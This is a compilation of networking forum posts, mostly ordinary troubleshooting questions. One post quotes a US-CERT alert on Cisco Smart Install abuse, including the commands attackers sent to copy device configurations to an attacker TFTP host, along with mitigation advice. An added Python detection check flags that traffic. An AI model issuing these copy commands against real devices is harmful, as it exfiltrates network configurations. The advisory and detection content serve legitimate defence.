Creating a new ISP company Networking |
- Creating a new ISP company
- Moronic Monday!
- Why are Quantum (Editshare, SNS, et al...) NAS products so expensive?
- Meraki - problem with IPsec through MX device
- What am I doing wrong adding this new switch to the stack?
- Any particular site that is user friendly for learning networking?
- Pulse Secure Client for Windows insecurity
- Meraki - Good idea? Bad idea?
- Installing FirePOWER while Active/Standby Failover is running
- Trying to diagnose a drop in internet speed for computers not connected directly to my router.
- Smart Install MS-ISAC Notice
- How will a dualport Mellanox 100Gbe NIC behave in a single PCIe 3.0 16x slot?
- Tell me about THE worst day/week you ever had in your career, and why it still gives you nightmares?
- Split Tunnel: DNS Protection Options?
- Cox Fiber question
- Redesign of multi-site ring with NSX
- Looking to decorate work space. Post your best Networking meme's!
- Most Valuable Research Topic
- Cisco MESH help
- Packet Tracer download
- 2 inside NAT interfaces with 2 outside interfaces
- Avocent Cyclades 6048 unable to login
- DHCP Helper and DHCP Server on same VLAN. Who wins?
Creating a new ISP company Posted: 16 Apr 2018 10:27 AM PDT Hello friends, I'm certain this has been discussed many times over as I've seen a small handful of other posts regarding this matter. However, given the circumstances and access to funds, it is within my capacity to bring a new ISP to the rural area in which I live. It currently only offers two other ISPs that are atrocious and the area is in desperate need of a new solution. No data caps, better pricing, better speeds and just overall a better network. The purpose of this post is really to attain the following:
The idea is to run fiber directly to the home. And for the super rural areas, the plan is to implement a WISP network to cut down on fiber costs. Any insight from anyone experienced in this field is incredibly appreciated. My town needs this help... And I want to provide that to them. TLDR: How to get started building a new ISP in small rural town. Fiber costs? Project costs? Red tape? [link] [comments] |
Moronic Monday! Posted: 16 Apr 2018 05:12 AM PDT It's Monday, you've not yet had coffee and the week ahead is gonna suck. Let's open the floor for a weekly Stupid Questions Thread, so we can all ask those questions we're too embarrassed to ask! Post your question - stupid or otherwise - here to get an answer. Anyone can post a question and the community as a whole is invited and encouraged to provide an answer. Serious answers are not expected. [link] [comments] |
Why are Quantum (Editshare, SNS, et al...) NAS products so expensive? Posted: 16 Apr 2018 06:00 AM PDT Okeydoke, I work for the small video production arm of a larger organisation. We are a mix of Macs and PCs, we're growing, we're messy, and we're about to upgrade our network infrastructure (only my team, not the wider organisation). I've been discussing some typical workload scenarios with our IT contractors, and based on this we've created a solution based around a Synology RS3617xs. The proposed solution looks as though it will perform all the tasks required of it, and give us the performance we need (including two workstations editing 4K directly from the NAS over 10GbE). Great. However, I'm aware of video specific networking products from companies like Quantum, companies with "entry level" solutions that start at about 5x the cost of our current Synology-based proposal (we're at around $15k, Quantum's Xcellis Foundation would be around $70k). Such products are pitched at teams of around our size and workload, but they come at a significant premium. Why? I've been trying to read up on the benefits of this premium kit, but while I (hopefully) understand the USPs being advertised, I'm struggling to see the 5-6x value that arises from the 5-6x cost. Ultimately, I think we'll pursue the Synology solution, benefit hugely, and that will be that (partly because we don't have the budget for more expensive infrastructure). Perhaps my inability to better appreciate the value of video specific networking products suggests that I am not in the market for them. That said, I do have purchasing decisions to make and I am keen for them to be educated. I hope this qualifies as a relevant question. I've deliberately avoided talk of team sizes and typical video bitrate in an attempt to minimize reading tedium. Ta in advance, [link] [comments] |
Meraki - problem with IPsec through MX device Posted: 16 Apr 2018 03:08 PM PDT Hello All, We have a problem with Cisco Meraki MX. The Meraki appliance should replace the current firewall which is deployed at the customer. Almost everything is doing well, but there is an ASA behind the Meraki (in the DMZ section), which is doing site to site to another location (the ASA and remote peer are not managed by us). For the DMZ section the MX appliance is doing 1:1 NAT for every public IP. The devices which are situated there are accessible from the Internet. So the NAT is going well. BUT ... When the ASA is trying to establish IPsec through the MX, the tunnel is not working. According to the 3rd party, Phase 1 is UP but there is a problem with Phase 2. The MX is in NAT mode. According to the manual, 1:1 NAT is configured; NAT-T is confirmed as enabled on both of the ASAs. https://documentation.meraki.com/MX-Z/Other_Topics/Using_VPN_through_an_MX_Security_Appliance Did you also have a problem with this setup? Thank you in advance. Sorry for my bad English. Drawing for simplification: [link] [comments] |
What am I doing wrong adding this new switch to the stack? Posted: 16 Apr 2018 02:50 PM PDT Okay I've stacked a ton of Cisco switches, though I've technically never just thrown a new switch into an existing stack. I've got a site that had an extra switch they wanted to add into their existing stack of 3750X switches. It already had a previous config, but from my knowledge and everything I thought I interpreted reading on that, you should be able to throw that on there and the current master should just default it, as long as I didn't lose power to the stack or something.
However, when I did this, it decided to take over master, wipe the config and give the stack its own previous configuration. I figured, yeah I'm being sort of lazy I should have done it right. So I got things back to normal, had the customer remove the switch, wipe it, set priority. Connected it again, bam takes the stack down again and wipes them. How is it taking over this stack every time? [link] [comments] |
Any particular site that is user friendly for learning networking? Posted: 16 Apr 2018 02:35 PM PDT I'm trying to find a site that has write ups for networking concepts, protocols, troubleshooting recommendations etc. I do like Cisco's and Juniper's documentation but they can be cryptic and can sometimes have too much information. A YouTube channel will work as well. I do like INE but it's hard to find exactly which video to watch based off my particular questions. Any suggestions are helpful. Thanks [link] [comments] |
Pulse Secure Client for Windows insecurity Posted: 16 Apr 2018 02:33 PM PDT We are constantly having problems with the Pulse Secure VPN client asking for passwords in a login window that LOOKS like it is modal, but in fact is not. This causes problems where the password can end up anywhere even if the Pulse Secure login window is the frontmost window and the password text field has focus. This is especially bad if the password ends up in something like a chat window instead. This is of course extremely poor design by Pulse Secure but unfortunately, they seem to be completely uninterested in fixing this. Anything we can do on our side to avoid these problems? This is what the supposed-to-be modal window looks like and the problem with it [link] [comments] |
Meraki - Good idea? Bad idea? Posted: 16 Apr 2018 10:15 AM PDT Has anyone here used them and if so, have you encountered a situation in which the Meraki hardware couldn't do something that you could have gotten from a regular Cisco device? I'm not too worried about the licensing vs one-time-buy decision, this is purely about the technical capabilities. EDIT: Based on the responses I realize that I need to provide more detail.
Basically, the company has a large network without anyone with the knowledge to properly manage it. And from what I'm gathering, they won't ever get the 'OKAY' to pay what a true network engineer would cost. At most they'll hire a CCNA level. With that in mind, I was thinking Meraki purely for the ease of management. [link] [comments] |
Installing FirePOWER while Active/Standby Failover is running Posted: 16 Apr 2018 06:09 AM PDT Hi all, Does anyone have any experience with installing FirePOWER while having Active/Standby Failover running? Is there anything special to consider or can one simply proceed as normal as per Cisco's installation guides? These are two 5525s in case it makes a difference. Nobody in my team has done anything with FirePOWER before so I'm turning to you guys. Thanks! [link] [comments] |
Trying to diagnose a drop in internet speed for computers not connected directly to my router. Posted: 16 Apr 2018 01:37 PM PDT [Solved] My office network has an internet connection which is approximately 80Mbps download. All computers connected directly to my router get approximately those speeds when I run a speed test. However, any computers which go through a hub to get to the internet will see a significant drop in speed to something like 20Mbps. All of the computers are connected via Cat6 cable, and the router and hub are all gigabit connections. The way I diagnosed this problem was by running a speed test on a computer connected to the hub as a benchmark. I then unplugged the cable from the router and the cable to the computer and connected them with a coupler (creating a direct link to the router). After doing this I ran another speed test on that computer and received nearly identical speeds to the other computers connected directly. One question I have is whether it is normal to see speeds throttled like this after a hub, or if this indicates a problem with the equipment. Due to the layout of the building it would be very difficult to have a direct connection of the router for all computers, so the use of hubs is necessary. [link] [comments] |
Smart Install MS-ISAC Notice Posted: 16 Apr 2018 01:23 PM PDT I was reading a notice from MS-ISAC: https://www.us-cert.gov/ncas/alerts/TA18-106A Then I laughed when I saw this https://imgur.com/a/YWzU4 The specific mention of the Cisco Smart Install vulnerability. I always found it odd to see this exploit mentioned as a misuse by Cisco in 2017. I have almost never seen that label before. Then to read that the tools to run this exploit were found in November of 2016. It's really shocking to see that this big exploit was out there and Cisco officially announced it in March. I understand that ACLs can prevent this exploit, but like the notice mentions it is on the ISP and service equipment that can still have this exploit. https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170214-smi Then it was marked as a vulnerability in 2018. https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2 A good read about the vulnerability last year.
"Between June 29 and July 6, 2017, Russian actors used the Cisco Smart Install protocol to scan for vulnerable network devices. Two Russian cyber actor-controlled hosts, 91.207.57.69(3) and 176.223.111.160(4), connected to IPs on several network ranges on port 4786 and sent the following two commands:
copy nvram:startup-config flash:/config.text
copy nvram:startup-config tftp://[actor address]/[actor filename].conf
In early July 2017, the commands sent to targets changed slightly, copying the running configuration file instead of the startup configuration file. Additionally, the second command copies the file saved to flash memory instead of directly copying the configuration file.
copy system:running-config flash:/config.text
copy flash:/config.text tftp://[actor address]/[actor filename].conf"
A nice write up how to mitigate. Of course there's patching.
"How to Mitigate SMI Abuse
- Configure network devices before installing onto a network exposed to the Internet. If SMI must be used during installation, disable SMI with the "no vstack" command before placing the device into operation.
- Prohibit remote devices attempting to cross a network boundary over TCP port 4786 via SMI.
- Prohibit outbound network traffic to external devices over UDP port 69 via TFTP.
- See Cisco recommendations for detecting and mitigating SMI. [10]
Cisco IOS runs in a variety of network devices under other labels, such as Linksys and SOHO Internet Gateway routers or firewalls as part of an Internet package by ISPs (e.g., Comcast). Check with your ISP and ensure that they have disabled SMI before or at the time of installation, or obtain instructions on how to disable it." [link] [comments] |
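Added example (not part of the post above or of the quoted alert): a small Python check for the two traffic rules the alert lists, TCP 4786 crossing the network boundary and UDP 69 leaving to an external host, plus a test for the "no vstack" line. The flow records, the 10.0.0.0/8 boundary, all function names and the assumption that "no vstack" appears as its own line in a saved config are constructed for illustration.

```python
import ipaddress

# Constructed sample flow records (not real traffic): proto, src, dst, dst_port.
# External addresses use the RFC 5737 documentation ranges.
SAMPLE_FLOWS = [
    ("tcp", "203.0.113.10", "10.0.0.5", 4786),  # external host -> internal switch (SMI)
    ("tcp", "10.0.0.20", "10.0.0.5", 4786),     # internal host -> switch, stays inside
    ("udp", "10.0.0.5", "198.51.100.7", 69),    # switch -> external TFTP server
    ("udp", "10.0.0.5", "10.0.0.30", 69),       # switch -> internal TFTP server
    ("tcp", "10.0.0.8", "203.0.113.44", 443),   # unrelated web traffic
]

# Assumed network boundary: everything in 10.0.0.0/8 is "inside".
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]


def is_internal(addr, nets=INTERNAL_NETS):
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in nets)


def classify_flow(proto, src, dst, dport, nets=INTERNAL_NETS):
    """Return a finding for traffic the alert says to prohibit, else None."""
    src_in, dst_in = is_internal(src, nets), is_internal(dst, nets)
    # SMI on TCP 4786 is flagged in either direction once it crosses the boundary.
    if proto == "tcp" and dport == 4786 and src_in != dst_in:
        return "SMI tcp/4786 crossing network boundary"
    # TFTP is flagged only when an inside host sends to an outside host.
    if proto == "udp" and dport == 69 and src_in and not dst_in:
        return "TFTP udp/69 outbound to external host"
    return None


def review_flows(flows, nets=INTERNAL_NETS):
    """Return (flow, reason) pairs for every flagged flow, in input order."""
    findings = []
    for flow in flows:
        reason = classify_flow(*flow, nets=nets)
        if reason:
            findings.append((flow, reason))
    return findings


def smi_disabled(config_text):
    """True if a saved config has a 'no vstack' line (assumed config format)."""
    return any(line.strip() == "no vstack" for line in config_text.splitlines())


if __name__ == "__main__":
    for flow, reason in review_flows(SAMPLE_FLOWS):
        print(reason, flow)
```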
How will a dualport Mellanox 100Gbe NIC behave in a single PCIe 3.0 16x slot? Posted: 16 Apr 2018 02:42 AM PDT I want to buy a Mellanox Connectx-5 NIC with two 100Gbe ports. However, the max throughput of a PCIe 3.0 16x slot is only 126Gbps.
I've read the card's user manual but there is no mention of this, so I'm asking here. Thank you in advance. [link] [comments] |
Tell me about THE worst day/week you ever had in your career, and why it still gives you nightmares? Posted: 15 Apr 2018 06:51 PM PDT Was it users being complete dumbasses? Your bosses completely fucking over your network, making work ten times harder? Terrible coworkers? An abrupt change in policy by people who have no fucking idea what you do day-to-day? Let's hear it all! Worst of the worst. [link] [comments] |
Split Tunnel: DNS Protection Options? Posted: 16 Apr 2018 12:31 PM PDT Currently we are utilizing F5 Edge Client for SSL VPN. For the longest time we were full tunneling, but our VP eventually forced our hands to go split-tunnel (I know all the security risks, yes, I know full is better but that isn't a discussion). On our F5, I have it enabled to not allow local DNS servers so it forces it through our Infoblox DNS. Our management, however, wants to add another layer of security. I know really basic knowledge about Umbrella and Infoblox having DNS threat protection. I am curious for those who are using those products or similar on how they are handling it and what products? Our primary requirement is that no matter where they are connected, they are always using our DNS for resolution and not Google or whatever. We know some products you have to install a client locally on the machine. We want to make sure we have a product that locks it down and some smart developer or googler can't find a way to disable it. We currently use Checkpoint, but are wanting to move to Palo Alto and prefer it. I hate Cisco ASAs/Firepower with a fury powered by 1000 suns and the word Anyconnect was brought up and I shuddered. However, I am trying to keep an open mind and willing to hear the pros and cons of it. Just curious to see what people are using today, how you are using it and what has and hasn't worked. [link] [comments] |
Cox Fiber question Posted: 16 Apr 2018 12:12 PM PDT More of a curiosity than really a question. So we had a dedicated fiber link into our admin building for our school district. At one point it was decided to move the head end to a different building in case this one turns back into classrooms. So the circuit at our office is essentially dead to us. Today power was moved from that old equipment. Cox called within an hour because they couldn't reach that equipment and it was taking down someone else. Why was someone else's circuit being routed through our building? Just seems counter productive to do it that way? Don't know much about carrier grade stuff though. Cox guy came and jumpered in the fiber patch box on the rack. [link] [comments] |
Redesign of multi-site ring with NSX Posted: 16 Apr 2018 12:11 PM PDT We're about to implement NSX and I am using the opportunity to re-work our networks and routing. I'm a little reluctant to ask this because it seems pretty basic, but I'm primarily a server guy and this is a bit out of my comfort zone. Scenario: We have three main sites that form a ring. All three sites have various user subnets, but sites A and B also contain datacenters with VMware hosts.
All Sites:
Sites A and B:
Virtual Infrastructure:
Questions:
Thanks! [link] [comments] |
Looking to decorate work space. Post your best Networking meme's! Posted: 16 Apr 2018 03:36 PM PDT |
Most Valuable Research Topic Posted: 16 Apr 2018 10:14 AM PDT I am a college senior and I have to do a 20 minute presentation on one of the following topics. Which of these do you think would be the most valuable to have a deeper understanding of in the networking field? Dynamic DNS [link] [comments] |
Cisco MESH help Posted: 16 Apr 2018 09:33 AM PDT Jr. Network Engineer here. I've been tasked with a massive list of PLC devices and have to find what switch each is connected to. I was only given the IPs of the PLC devices and then got their MAC addresses from our firewall. Next I went to our core switches and ran the MACs in there and am literally tracing them out through cdp neighbor from there. All is fine until I hit our MESH radios. Where do I go from here? Here's an example. Core Switch -> 'x' switch -> ie2000 switch -> Cisco 1552 RAP Can I find a list of all the MACs passing through that radio on our WLC? Or how should I proceed? Thanks in advance for any help. [link] [comments] |
Packet Tracer download Posted: 16 Apr 2018 08:47 AM PDT Hello, does anyone know where I can download Packet Tracer from for free without the student login? [link] [comments] |
2 inside NAT interfaces with 2 outside interfaces Posted: 16 Apr 2018 07:07 AM PDT I have 2 internet connections coming into my router, one is the primary connection and the other is a failover connection. Currently I have my primary connection plugged into ge0/1 and my ip nat inside source list interface is ge0/1. When the primary connection goes down the failover automatically routes traffic across my vpn but internet traffic is lost. Is there a way to set 2 inside nat source lists or a way to configure some kind of dynamic nat? Thanks. [link] [comments] |
Avocent Cyclades 6048 unable to login Posted: 16 Apr 2018 12:36 AM PDT Hi Guys, I have an ACS 6048 terminal server which was working fine. Strangely I noticed today that I am not able to log in to the ACS, however I can log in to other switches' consoles fine. Login error while connecting to ACS via CLI: Error: Failed to connect to UIC, system error description! [Error - 111: Connection refused] Tried searching on the web but didn't find any answers or what this UIC error means. Has somebody faced such issues or does anyone have a solution, please? [link] [comments] |
DHCP Helper and DHCP Server on same VLAN. Who wins? Posted: 16 Apr 2018 05:15 AM PDT Is it a case of who responds first? Or will the DHCP Helper intercept and forward all DHCP requests to the DHCP Server specified by the DHCP Helper? [link] [comments] |